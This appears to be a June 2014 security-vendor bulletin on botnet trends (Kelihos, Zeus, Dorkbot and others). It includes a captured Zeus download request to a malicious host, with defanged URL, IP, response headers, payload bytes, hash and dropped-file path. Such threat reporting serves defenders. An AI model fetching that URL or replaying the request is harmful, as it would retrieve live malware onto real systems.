Bot Review

Table: Bots under analysis (June 2014, Lavasoft MAS).

Bot distribution in June:

Kelihos. We saw a significant decrease of Kelihos backdoors discovered in the Lab from 58% in May to 9% in June here.

Cycbot. You can find the latest description of Cycbot here here.

Shiz. The latest example is here.

Zbot. This month the Zeus takes the lead with more than 70% of all bots. See the report in Malware Encyclopedia. 12% of all detected Zeus samples use Tor client.

Zeus continues downloading its files in an encrypted form:

URL	IP
hxxp://thepristinehorizon.com/images/0403UKc.elf	216.157.85.89

In this example it downloads file with extension .elf from the server in Atlanta, US (693594 bytes were transferred):

GET /images/0403UKc.elf HTTP/1.1

Accept: text/*, application/*

User-Agent: Updates downloader

Host: thepristinehorizon.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Jun 2014 08:30:31 GMT

Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

Last-Modified: Tue, 04 Mar 2014 08:01:31 GMT

ETag: "440923-7e8ee-4f3c34fe95e48"

Accept-Ranges: bytes

Content-Length: 518382

Content-Type: text/plain

ZZP..MN/.fNa..N...~.?.N...cc..JZ...b..Qbz.N..;o.......&...n...)...NB..
 ...nb..n...n...n&..n..v*...Ch...b..v....,..M`.5.a...&..Le..J`...,[.A.
..Ne...J..Lm..I...I0..&c...2..Nb..Jb(.....]...Ob..Gb..Fb..>cB..R@.^

<<< skipped >>>

The copy of the trojan was placed into the temp folder with the following name (MD5: 1fe01bf0357e8f40244e87a521e319c7, 23 094 bytes in size):

%Temp%\opera_autoupdater.exe

NrgBot/Dorkbot. The number of Dorkbots has declined this month. You can find the latest description here. New samples keep the same malicious payload as the last month.

Blazebot/Rbot. The latest description is available in Malware Encyclopedia.

Read also:
Lavasoft Security Bulletin - June 2014: Top Threats.
Beware of FIFA World Cup 2014 Scams.